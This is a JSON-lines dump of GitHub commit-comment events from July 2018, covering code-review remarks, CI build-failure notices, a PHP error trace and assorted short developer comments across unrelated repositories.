{"id":"7968067505","type":"CommitCommentEvent","actor":{"login":"fightingtheboss"},"repo":{"name":"gsorokolit/mar26_red0"},"payload":{"comment":{"id":29714534,"position":25,"line":31,"path":"bank_account.rb","commit_id":"52b43975561f67646315022eb8080f205ddb7092","created_at":"2018-07-15T22:30:25Z","updated_at":"2018-07-15T22:30:25Z","author_association":"NONE","body":"This line should be indented so it's clear when reading that the code is within the `do...end`"}},"created_at":"2018-07-15T22:30:25Z"}
{"id":"7968068084","type":"CommitCommentEvent","actor":{"login":"fightingtheboss"},"repo":{"name":"gsorokolit/mar26_red0"},"payload":{"comment":{"id":29714538,"position":27,"line":33,"path":"bank_account.rb","commit_id":"52b43975561f67646315022eb8080f205ddb7092","created_at":"2018-07-15T22:30:53Z","updated_at":"2018-07-15T22:30:53Z","author_association":"NONE","body":"Again, you can use the implicit return here, no need for the `return` keyword."}},"created_at":"2018-07-15T22:30:53Z"}
{"id":"7968068364","type":"CommitCommentEvent","actor":{"login":"twobob"},"repo":{"name":"Unity-Technologies/AutoLOD"},"payload":{"comment":{"id":29714540,"position":null,"line":null,"path":null,"commit_id":"7959d5f78e3fa722b64f276ddec71953fd0f2378","created_at":"2018-07-15T22:31:07Z","updated_at":"2018-07-15T22:31:07Z","author_association":"NONE","body":"Meh on windows I get an ssh fail despite lots of hand waving and attempts to get it to swallow my pub.\r\nIt's fine. I'll just hand adjust them for now. thanks."}},"created_at":"2018-07-15T22:31:07Z"}
{"id":"7968069660","type":"CommitCommentEvent","actor":{"login":"fightingtheboss"},"repo":{"name":"gsorokolit/mar26_red0"},"payload":{"comment":{"id":29714542,"position":44,"line":38,"path":"bank_account.rb","commit_id":"52b43975561f67646315022eb8080f205ddb7092","created_at":"2018-07-15T22:32:11Z","updated_at":"2018-07-15T22:32:11Z","author_association":"NONE","body":"This line should be indented, as it's within the `do...end`. Also, all unary operators should have spaces around them (i.e.`x.balance * @@interest_rate`)"}},"created_at":"2018-07-15T22:32:11Z"}
{"id":"7968070185","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714544,"position":null,"line":null,"path":null,"commit_id":"6a256cb50727c27499946f9872fc91d3d2cf9f7b","created_at":"2018-07-15T22:32:40Z","updated_at":"2018-07-15T22:32:40Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 499](https://ci.hashicorp.engineering/viewLog.html?buildId=104042&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-15T22:32:40Z"}
{"id":"7968070654","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714545,"position":null,"line":null,"path":null,"commit_id":"6a256cb50727c27499946f9872fc91d3d2cf9f7b","created_at":"2018-07-15T22:33:07Z","updated_at":"2018-07-15T22:33:07Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 499](https://ci.hashicorp.engineering/viewLog.html?buildId=104042&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:27"}},"created_at":"2018-07-15T22:33:07Z"}
{"id":"7968070864","type":"CommitCommentEvent","actor":{"login":"johannesvollmer"},"repo":{"name":"johannesvollmer/id-map"},"payload":{"comment":{"id":29714546,"position":null,"line":null,"path":null,"commit_id":"a28f19d04ab6bc0e1727d1abaa6a005033d3dfbd","created_at":"2018-07-15T22:33:17Z","updated_at":"2018-07-15T22:33:17Z","author_association":"OWNER","body":"Closes #2 "}},"created_at":"2018-07-15T22:33:17Z"}
{"id":"7968071426","type":"CommitCommentEvent","actor":{"login":"fightingtheboss"},"repo":{"name":"gsorokolit/mar26_red0"},"payload":{"comment":{"id":29714547,"position":60,"line":54,"path":"bank_account.rb","commit_id":"52b43975561f67646315022eb8080f205ddb7092","created_at":"2018-07-15T22:33:45Z","updated_at":"2018-07-15T22:33:45Z","author_association":"NONE","body":"I would move the above operations outside of the class or, better yet, into a new file that requires the `BankAccount` class. You generally shouldn't have the code that uses the class in the class definition itself."}},"created_at":"2018-07-15T22:33:45Z"}
{"id":"7968071476","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714548,"position":null,"line":null,"path":null,"commit_id":"c6723dfa73ada297d010c090f14b1986caa406ac","created_at":"2018-07-15T22:33:48Z","updated_at":"2018-07-15T22:33:48Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 500](https://ci.hashicorp.engineering/viewLog.html?buildId=104043&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-15T22:33:48Z"}
{"id":"7968071858","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714549,"position":null,"line":null,"path":null,"commit_id":"c6723dfa73ada297d010c090f14b1986caa406ac","created_at":"2018-07-15T22:34:09Z","updated_at":"2018-07-15T22:34:09Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 500](https://ci.hashicorp.engineering/viewLog.html?buildId=104043&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:20"}},"created_at":"2018-07-15T22:34:09Z"}
{"id":"7968072725","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29714550,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-15T22:34:53Z","updated_at":"2018-07-15T22:34:53Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - Win64-Windows-7-VisualStudio-14: Tests Failed (2374 of 2935 tests passed, 62 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 557 tests had: Table big diffs.\n * 76 tests had: ESO big diffs.\n * 102 tests had: AUD diffs.\n * 156 tests had: BND diffs.\n * 168 tests had: ESO small diffs.\n * 151 tests had: MDD diffs.\n * 156 tests had: MTD diffs.\n * 151 tests had: RDD diffs.\n * 103 tests had: MTR small diffs.\n * 35 tests had: MTR big diffs.\n * 21 tests had: ERR diffs.\n * 1 test had: Table small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 62\n * Failed: 561\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.89%25-red.png)</a> \n"}},"created_at":"2018-07-15T22:34:53Z"}
{"id":"7968072853","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29714551,"position":null,"line":null,"path":null,"commit_id":"b8a736b5561e198674b47c97156921d700420e56","created_at":"2018-07-15T22:34:59Z","updated_at":"2018-07-15T22:34:59Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-53](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-53).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-53-tre.pantheonsite.io/)"}},"created_at":"2018-07-15T22:34:59Z"}
{"id":"7968079194","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29714560,"position":null,"line":null,"path":null,"commit_id":"b9070c7674aec2d2e2a0803f92a2c34e5b4cee6c","created_at":"2018-07-15T22:38:27Z","updated_at":"2018-07-15T22:38:27Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1693 of 1693 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b9070c7674aec2d2e2a0803f92a2c34e5b4cee6c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b9070c7674aec2d2e2a0803f92a2c34e5b4cee6c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b9070c7674aec2d2e2a0803f92a2c34e5b4cee6c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-39.61%25-green.png)</a>\n"}},"created_at":"2018-07-15T22:38:27Z"}
{"id":"7968081978","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714567,"position":null,"line":null,"path":null,"commit_id":"d8403681345cbce61f6f3ba451f9a39ff6369abf","created_at":"2018-07-15T22:40:55Z","updated_at":"2018-07-15T22:40:55Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 501](https://ci.hashicorp.engineering/viewLog.html?buildId=104044&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-15T22:40:55Z"}
{"id":"7968082345","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714569,"position":null,"line":null,"path":null,"commit_id":"d8403681345cbce61f6f3ba451f9a39ff6369abf","created_at":"2018-07-15T22:41:15Z","updated_at":"2018-07-15T22:41:15Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 501](https://ci.hashicorp.engineering/viewLog.html?buildId=104044&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:20"}},"created_at":"2018-07-15T22:41:15Z"}
{"id":"7968082876","type":"CommitCommentEvent","actor":{"login":"Gnat008"},"repo":{"name":"Gnat008/perworldinventory-kt"},"payload":{"comment":{"id":29714571,"position":23,"line":61,"path":"src/test/kotlin/me/ebonjaeger/perworldinventory/conversion/ConvertTaskTest.kt","commit_id":"8fe3d7dd88fd8e3758f71b3a3a78e6c8510d7476","created_at":"2018-07-15T22:41:47Z","updated_at":"2018-07-15T22:41:47Z","author_association":"OWNER","body":"@ljacqu If you happen to figure this test out sometime, that would be amazing. I just can't trick it into thinking the task is scheduled.\r\n\r\nLast August there was a change that removed the `taskId` field from `BukkitRunnable`, and the cancelling logic has changed slightly. It now checks for a set `BukkitTask` but I haven't figured out how to get one to set there."}},"created_at":"2018-07-15T22:41:47Z"}
{"id":"7968086391","type":"CommitCommentEvent","actor":{"login":"spodermenpls"},"repo":{"name":"kkapsner/CanvasBlocker"},"payload":{"comment":{"id":29714574,"position":null,"line":null,"path":null,"commit_id":"47a9519cebe2fe3840c498ffafa0b245cc735fca","created_at":"2018-07-15T22:44:48Z","updated_at":"2018-07-15T22:44:48Z","author_association":"CONTRIBUTOR","body":"Bei \"cannot be protected agains\" fehlt ein \"t\" bei \"against\". Der neue Zusatz bei AMO \"Geschütze \"Fingerprinting\"-APIs:\" fehlt ebenfalls ein \"t\" bei \"Geschützte\"."}},"created_at":"2018-07-15T22:44:48Z"}
{"id":"7968086729","type":"CommitCommentEvent","actor":{"login":"DmitriyRF"},"repo":{"name":"DmitriyRF/TEST242"},"payload":{"comment":{"id":29714576,"position":null,"line":null,"path":null,"commit_id":"bf8d9d4f1010d5eb02a4a14e28bcf0cc5e3b0367","created_at":"2018-07-15T22:45:08Z","updated_at":"2018-07-15T22:45:08Z","author_association":"OWNER","body":"It's showing difference and what is changed"}},"created_at":"2018-07-15T22:45:08Z"}
{"id":"7968087998","type":"CommitCommentEvent","actor":{"login":"warmfrost85"},"repo":{"name":"BeermotorWB/wrye-bash"},"payload":{"comment":{"id":29714579,"position":10,"line":142,"path":"Mopy/bash/game/skyrimse/__init__.py","commit_id":"2dd08b44baaf628ad2908289b12f177b5afbe9ed","created_at":"2018-07-15T22:46:14Z","updated_at":"2018-07-15T22:46:14Z","author_association":"NONE","body":"I've fixed your version in my personal repository for several months now. Merging, bash tags, patches, etc. which look good when I check them in xEdit. It will be interesting when others try it."}},"created_at":"2018-07-15T22:46:14Z"}
{"id":"7968088274","type":"CommitCommentEvent","actor":{"login":"dilijev"},"repo":{"name":"bterlson/test262-harness"},"payload":{"comment":{"id":29714580,"position":3,"line":2,"path":".gitignore","commit_id":"be2f0a453996c9e5fcae45c34ac3ffbe56c9bfbf","created_at":"2018-07-15T22:46:28Z","updated_at":"2018-07-15T22:46:28Z","author_association":"CONTRIBUTOR","body":"Should this consistently use `|` versus `,`?"}},"created_at":"2018-07-15T22:46:28Z"}
{"id":"7968088954","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714581,"position":null,"line":null,"path":null,"commit_id":"403d577513c690abf503c40019e31a1864484587","created_at":"2018-07-15T22:47:06Z","updated_at":"2018-07-15T22:47:06Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 502](https://ci.hashicorp.engineering/viewLog.html?buildId=104047&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-15T22:47:06Z"}
{"id":"7968089402","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714582,"position":null,"line":null,"path":null,"commit_id":"403d577513c690abf503c40019e31a1864484587","created_at":"2018-07-15T22:47:32Z","updated_at":"2018-07-15T22:47:32Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 502](https://ci.hashicorp.engineering/viewLog.html?buildId=104047&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:26"}},"created_at":"2018-07-15T22:47:32Z"}
{"id":"7968090780","type":"CommitCommentEvent","actor":{"login":"Jessicachong"},"repo":{"name":"qos-ch/logback"},"payload":{"comment":{"id":29714584,"position":null,"line":null,"path":null,"commit_id":"4dd08e68321548cd85251ec389f5a832505e1268","created_at":"2018-07-15T22:48:42Z","updated_at":"2018-07-15T22:48:42Z","author_association":"NONE","body":"#5dd08e6"}},"created_at":"2018-07-15T22:48:42Z"}
{"id":"7968090798","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeCheckstyle/tokentree-formatter"},"payload":{"comment":{"id":29714585,"position":5,"line":17,"path":"test/testcases/indentation/increasing_indent_in_doc_comments_issue_3.hxtest","commit_id":"ff4f4d6a1827f5c7cb597b8dc1eca433533c8558","created_at":"2018-07-15T22:48:43Z","updated_at":"2018-07-15T22:48:43Z","author_association":"MEMBER","body":"There shouldn't be a space here."}},"created_at":"2018-07-15T22:48:43Z"}
{"id":"7968091468","type":"CommitCommentEvent","actor":{"login":"ReactiioN1337"},"repo":{"name":"frk1/hazedumper"},"payload":{"comment":{"id":29714586,"position":null,"line":null,"path":null,"commit_id":"59749e4e675adb44ae3af20f195c1107d3cf6b58","created_at":"2018-07-15T22:49:22Z","updated_at":"2018-07-15T22:49:22Z","author_association":"COLLABORATOR","body":"We both are working and aren't 24/7 online. Updated to the latest build (regular & panorama) \r\nhttps://github.com/frk1/hazedumper/commit/e8d10a1cf127c7d3d4413ffa852be099571ab84f"}},"created_at":"2018-07-15T22:49:22Z"}
{"id":"7968092069","type":"CommitCommentEvent","actor":{"login":"Jessicachong"},"repo":{"name":"qos-ch/logback"},"payload":{"comment":{"id":29714588,"position":null,"line":null,"path":null,"commit_id":"4dd08e68321548cd85251ec389f5a832505e1268","created_at":"2018-07-15T22:49:56Z","updated_at":"2018-07-15T22:49:56Z","author_association":"NONE","body":"#4dd08e6"}},"created_at":"2018-07-15T22:49:56Z"}
{"id":"7968093378","type":"CommitCommentEvent","actor":{"login":"fraccer4545"},"repo":{"name":"chubin/cheat.sh"},"payload":{"comment":{"id":29714589,"position":2,"line":2,"path":"README.md","commit_id":"4c0bd4aee38555073bdb79a0ae5db47f5850944f","created_at":"2018-07-15T22:51:05Z","updated_at":"2018-07-15T22:51:05Z","author_association":"NONE","body":"Ok"}},"created_at":"2018-07-15T22:51:05Z"}
{"id":"7968093386","type":"CommitCommentEvent","actor":{"login":"DmitriyRF"},"repo":{"name":"DmitriyRF/TEST242"},"payload":{"comment":{"id":29714590,"position":null,"line":null,"path":null,"commit_id":"24ec73e471a54cae9b21f01042eda28013f6eb24","created_at":"2018-07-15T22:51:05Z","updated_at":"2018-07-15T22:51:05Z","author_association":"OWNER","body":"Ok, but if we will us FTP?"}},"created_at":"2018-07-15T22:51:05Z"}
{"id":"7968095447","type":"CommitCommentEvent","actor":{"login":"cdhassell"},"repo":{"name":"mecachisenros/woocommerce_civicrm"},"payload":{"comment":{"id":29714595,"position":null,"line":null,"path":null,"commit_id":"d23b3d8532cb96beaf6a5ca7ff19a327b762a69f","created_at":"2018-07-15T22:52:51Z","updated_at":"2018-07-15T22:52:51Z","author_association":"NONE","body":"I'm testing v2.1.  Clicking on the orders tab on a contact does this:\r\n\r\n> \r\n> [15-Jul-2018 18:41:34 America/New_York] PHP Fatal error:  Uncaught Error: Class 'CRM_Contact_Page_View_Purchases' not found in /var/www/wordpress/wp-content/plugins/civicrm/civicrm/CRM/Core/Invoke.php:294\r\n> Stack trace:\r\n> #0 /var/www/wordpress/wp-content/plugins/civicrm/civicrm/CRM/Core/Invoke.php(84): CRM_Core_Invoke::runItem(Array)\r\n> #1 /var/www/wordpress/wp-content/plugins/civicrm/civicrm/CRM/Core/Invoke.php(52): CRM_Core_Invoke::_invoke(Array)\r\n> #2 /var/www/wordpress/wp-content/plugins/civicrm/civicrm.php(1246): CRM_Core_Invoke::invoke(Array)\r\n> #3 /var/www/wordpress/wp-includes/class-wp-hook.php(286): CiviCRM_For_WordPress->invoke('')\r\n> #4 /var/www/wordpress/wp-includes/class-wp-hook.php(310): WP_Hook->apply_filters('', Array)\r\n> #5 /var/www/wordpress/wp-includes/plugin.php(453): WP_Hook->do_action(Array)\r\n> #6 /var/www/wordpress/wp-admin/admin.php(224): do_action('toplevel_page_C...')\r\n> #7 {main}\r\n>   thrown in /var/www/wordpress/wp-content/plugins/civicrm/civicrm/CRM/Core/Invoke.php on line 294\r\n\r\nHowever, when I right-click on the orders tab and open it in a separate browser window it comes up cleanly.  So the error only relates to opening it in a civicrm contact tab. \r\n"}},"created_at":"2018-07-15T22:52:51Z"}
{"id":"7968095608","type":"CommitCommentEvent","actor":{"login":"Yehonal"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":29714596,"position":null,"line":null,"path":null,"commit_id":"85388901cf6a69659569ad751767fd7108b25a3c","created_at":"2018-07-15T22:53:00Z","updated_at":"2018-07-15T22:53:00Z","author_association":"MEMBER","body":"json because 2 reasons:\r\n\r\n1) json can be read natively by our modules web page: https://github.com/azerothcore/modules-catalogue , so we use json data to display extra information for module details.\r\n\r\n2) bash doesn't have a native yaml parser nor a json one. However i've tested JSONPath.sh script and it works quite well, so json is the right solution between our web page and bash system.\r\n\r\nabout line endings, yes, i agree\r\n"}},"created_at":"2018-07-15T22:53:00Z"}
{"id":"7968100044","type":"CommitCommentEvent","actor":{"login":"tmedwards"},"repo":{"name":"iftechfoundation/twine-cookbook"},"payload":{"comment":{"id":29714601,"position":19,"line":19,"path":"savinggames/sugarcube/sugarcube_savinggames_twee.txt","commit_id":"6eff6a01b69da253d3c2317b598c812c1b90ad1e","created_at":"2018-07-15T22:56:45Z","updated_at":"2018-07-15T22:56:45Z","author_association":"COLLABORATOR","body":"This should be `Save.slots.ok()`, as `Save.ok()` will return `true` if either slots or the autosave is available."}},"created_at":"2018-07-15T22:56:45Z"}
{"id":"7968100117","type":"CommitCommentEvent","actor":{"login":"spodermenpls"},"repo":{"name":"kkapsner/CanvasBlocker"},"payload":{"comment":{"id":29714602,"position":null,"line":null,"path":null,"commit_id":"47a9519cebe2fe3840c498ffafa0b245cc735fca","created_at":"2018-07-15T22:56:47Z","updated_at":"2018-07-15T22:56:47Z","author_association":"CONTRIBUTOR","body":"Bei \"cannot be protected agains\" fehlt ein \"t\" bei \"against\". Dem neuen Zusatz bei AMO \"Geschütze \"Fingerprinting\"-APIs:\" fehlt ebenfalls ein \"t\" bei \"Geschützte\". 😉"}},"created_at":"2018-07-15T22:56:47Z"}
{"id":"7968102124","type":"CommitCommentEvent","actor":{"login":"jacobrosenthal"},"repo":{"name":"apache/mynewt-core"},"payload":{"comment":{"id":29714606,"position":21,"line":71,"path":"hw/drivers/sensors/tsl2561/src/tsl2561.c","commit_id":"adb0b278107428f46ad36632fdc1327f9ccfb231","created_at":"2018-07-15T22:58:34Z","updated_at":"2018-07-15T22:58:34Z","author_association":"CONTRIBUTOR","body":"Fixed in https://github.com/apache/mynewt-core/pull/1261 I believe"}},"created_at":"2018-07-15T22:58:34Z"}
{"id":"7968105583","type":"CommitCommentEvent","actor":{"login":"MemoNano"},"repo":{"name":"MemoNano/Webinar"},"payload":{"comment":{"id":29714614,"position":null,"line":null,"path":null,"commit_id":"3fa7429c4c379e6a756ca8b9df0e8118c55719b4","created_at":"2018-07-15T23:01:28Z","updated_at":"2018-07-15T23:01:28Z","author_association":"OWNER","body":"jklafjldjflkqj"}},"created_at":"2018-07-15T23:01:28Z"}
{"id":"7968106546","type":"CommitCommentEvent","actor":{"login":"nsoranzo"},"repo":{"name":"mvdbeek/galaxy"},"payload":{"comment":{"id":29714615,"position":5,"line":473,"path":"lib/galaxy/tools/parameters/dynamic_options.py","commit_id":"491841275678e522ece73c0533974dcf2c46dfb7","created_at":"2018-07-15T23:02:20Z","updated_at":"2018-07-15T23:02:20Z","author_association":"COLLABORATOR","body":"Looks good to me, thanks for finding the right solution!"}},"created_at":"2018-07-15T23:02:20Z"}
{"id":"7968106548","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714616,"position":null,"line":null,"path":null,"commit_id":"086ea4f2d4975835d02006400abc24eaf5a915e6","created_at":"2018-07-15T23:02:20Z","updated_at":"2018-07-15T23:02:20Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 503](https://ci.hashicorp.engineering/viewLog.html?buildId=104048&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-15T23:02:20Z"}
{"id":"7968106995","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714617,"position":null,"line":null,"path":null,"commit_id":"086ea4f2d4975835d02006400abc24eaf5a915e6","created_at":"2018-07-15T23:02:42Z","updated_at":"2018-07-15T23:02:42Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 503](https://ci.hashicorp.engineering/viewLog.html?buildId=104048&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:22"}},"created_at":"2018-07-15T23:02:42Z"}
{"id":"7968107877","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29714618,"position":37,"line":null,"path":"pkg/command/howlongtobeat/howlongtobeat.go","commit_id":"9e4fe3d81a631ff2130015eb3ea554b2d46d154d","created_at":"2018-07-15T23:03:33Z","updated_at":"2018-07-15T23:03:33Z","author_association":"NONE","body":"golint: exported function NewHLTBCommand should have comment or be unexported"}},"created_at":"2018-07-15T23:03:33Z"}
{"id":"7968107880","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29714619,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"9e4fe3d81a631ff2130015eb3ea554b2d46d154d","created_at":"2018-07-15T23:03:33Z","updated_at":"2018-07-15T23:03:33Z","author_association":"NONE","body":"unparam: could not import github.com/disiqueira/ultraslackbot/pkg/command/howlongtobeat (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/howlongtobeat\" in any of:"}},"created_at":"2018-07-15T23:03:33Z"}
{"id":"7968107883","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29714620,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"9e4fe3d81a631ff2130015eb3ea554b2d46d154d","created_at":"2018-07-15T23:03:33Z","updated_at":"2018-07-15T23:03:33Z","author_association":"NONE","body":"unconvert: could not import github.com/disiqueira/ultraslackbot/pkg/command/howlongtobeat (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/howlongtobeat\" in any of:"}},"created_at":"2018-07-15T23:03:33Z"}
{"id":"7968107891","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29714621,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"9e4fe3d81a631ff2130015eb3ea554b2d46d154d","created_at":"2018-07-15T23:03:33Z","updated_at":"2018-07-15T23:03:33Z","author_association":"NONE","body":"go vet: cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/howlongtobeat\" in any of:"}},"created_at":"2018-07-15T23:03:33Z"}
{"id":"7968108045","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714623,"position":null,"line":null,"path":null,"commit_id":"c12654b15e0539b24501f2f3c8a69cf44840ad0e","created_at":"2018-07-15T23:03:42Z","updated_at":"2018-07-15T23:03:42Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 504](https://ci.hashicorp.engineering/viewLog.html?buildId=104049&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-15T23:03:42Z"}
{"id":"7968108342","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714626,"position":null,"line":null,"path":null,"commit_id":"c12654b15e0539b24501f2f3c8a69cf44840ad0e","created_at":"2018-07-15T23:04:02Z","updated_at":"2018-07-15T23:04:02Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 504](https://ci.hashicorp.engineering/viewLog.html?buildId=104049&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:19"}},"created_at":"2018-07-15T23:04:02Z"}
{"id":"7968108505","type":"CommitCommentEvent","actor":{"login":"easyly471"},"repo":{"name":"easyly471/project_zero"},"payload":{"comment":{"id":29714627,"position":null,"line":null,"path":null,"commit_id":"68d05dd33c73f86b22137f1c7ade2134caf85ca1","created_at":"2018-07-15T23:04:11Z","updated_at":"2018-07-15T23:04:11Z","author_association":"OWNER","body":"Muharrem bey dedise daha map kullanmam"}},"created_at":"2018-07-15T23:04:11Z"}
{"id":"7968112766","type":"CommitCommentEvent","actor":{"login":"chikamichi"},"repo":{"name":"jcharlesb/S02-E01-challenge-theatre-ou-cine-master"},"payload":{"comment":{"id":29714637,"position":78,"line":78,"path":"js/app.js","commit_id":"1f568d24e5d71f86a878b569ad3c5a9ba60fb4e9","created_at":"2018-07-15T23:07:56Z","updated_at":"2018-07-15T23:07:56Z","author_association":"NONE","body":"*So far so good* :+1: "}},"created_at":"2018-07-15T23:07:56Z"}
{"id":"7968113163","type":"CommitCommentEvent","actor":{"login":"LeoSammy"},"repo":{"name":"LeoSammy/DataVisualizerApp"},"payload":{"comment":{"id":29714638,"position":null,"line":null,"path":null,"commit_id":"b28cb40a68e72dd8ea321380bf549db700701d50","created_at":"2018-07-15T23:08:18Z","updated_at":"2018-07-15T23:08:18Z","author_association":"OWNER","body":"Changes to FXMLDocument.java controller are immediate "}},"created_at":"2018-07-15T23:08:18Z"}
{"id":"7968113264","type":"CommitCommentEvent","actor":{"login":"Jessicachong"},"repo":{"name":"binaryage/cljs-devtools"},"payload":{"comment":{"id":29714639,"position":null,"line":null,"path":null,"commit_id":"adcddd1988dec42ca315a708364adddc1047b011","created_at":"2018-07-15T23:08:25Z","updated_at":"2018-07-15T23:08:25Z","author_association":"NONE","body":"abcddd1"}},"created_at":"2018-07-15T23:08:25Z"}
{"id":"7968113343","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714640,"position":null,"line":null,"path":null,"commit_id":"baac4c075b9efeda588d805037b2cccceb28581f","created_at":"2018-07-15T23:08:29Z","updated_at":"2018-07-15T23:08:29Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 505](https://ci.hashicorp.engineering/viewLog.html?buildId=104050&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-15T23:08:29Z"}
